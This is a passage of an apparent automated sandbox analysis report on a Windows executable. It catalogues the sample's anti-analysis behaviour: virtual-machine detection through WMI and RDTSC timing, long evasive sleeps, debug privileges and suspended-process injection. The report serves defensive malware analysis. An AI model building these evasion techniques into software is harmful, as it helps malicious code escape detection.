Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe API/Special instruction interceptor: Address: 6922E92
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe API/Special instruction interceptor: Address: 35E2E92
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe RDTSC instruction interceptor: First address: 68C7DE5 second address: 68C7DE5 instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAF0072AF56h 0x00000008 cmp edx, ebx 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe RDTSC instruction interceptor: First address: 3587DE5 second address: 3587DE5 instructions: 0x00000000 rdtsc 0x00000002 test bh, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAF0074E376h 0x00000008 cmp edx, ebx 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Memory allocated: 35F60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Memory allocated: 35D10000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599007 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598889 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598547 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596672 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595683 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594914 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594702 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594554 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594437 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Window / User API: threadDelayed 1934 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Window / User API: threadDelayed 7912 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe API coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8128 Thread sleep count: 1934 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8128 Thread sleep count: 7912 > 30 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -599007s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598889s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -598094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -597000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595683s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -594914s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -594702s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -594554s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe TID: 8124 Thread sleep time: -594437s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0040276E FindFirstFileW, 4_2_0040276E
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405770
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 4_2_0040622B FindFirstFileW,FindClose, 4_2_0040622B
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 599007 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598889 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598547 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596672 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595683 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594914 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594702 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594554 Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Thread delayed: delay time: 594437 Jump to behavior
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}M^
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh3
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW, 0_2_00401752
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Enables debug privileges
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Queries volume information: C:\Users\user\Desktop\u9aPQQIwhj.exe VolumeInformation Jump to behavior
